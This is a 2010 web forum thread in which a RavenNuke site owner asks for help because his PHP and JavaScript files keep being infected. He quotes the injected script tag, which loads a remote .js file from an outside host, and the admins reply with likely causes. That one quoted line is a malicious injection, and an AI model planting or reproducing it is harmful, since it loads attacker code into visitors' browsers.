Ravens PHP Scripts: Forums

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security Issues
g0dsmacker

PostPosted: Mon Jun 14, 2010 5:28 pm Reply with quote

Hi guys I hope you can help me. Recently alot of .js files in my website are getting altered and antivirus programs keep saying there is a virus here.

My website is http://soa-squad.us/

I am running RavenNuke_v2.40.00 with nuke sentinal that came with this release the modern_gamer theme and clan_roster module purcased from clan themes.

The code I am finding at the bottom of the altered files is:
Code:
<script type="text/javascript" src="http://godlao.endokrinoloji.biz:8080/E-commerce.js"></script>

<!--0255a23e72f53a6640d3fd276c2dd6be-->

So far I have found index.php, mainfile.php and all files in includes/jquery folder. I am sure there is more.

I'm sure I will have to delete this website and reinstall it which I have done once allready but this virus or attack then returns.

Can anyone tell me how they get in to alter the files and what I should do to stop this from happening again.

Have a nice day
GodSmacker

Palbin
Site Admin

PostPosted: Mon Jun 14, 2010 7:57 pm Reply with quote

Your problem has to be with a third part module/script you put on your site, or if it is shared hosting it could be another account that is compromised. It could be a problem with our base code, but we have gotten no other reports of this recently.

You could ask your host to look at your access logs to see if they could figure out how it is happening.

"Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it." — Brian W. Kernighan. 
Palbin

PostPosted: Mon Jun 14, 2010 8:02 pm Reply with quote

I found another post on the web that was somewhat similar to your and they were on a shared host and thought that a script had been uploaded to the server and was infecting there site. I would contact your host with the problem.

Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security Issues

View next topic
View previous topic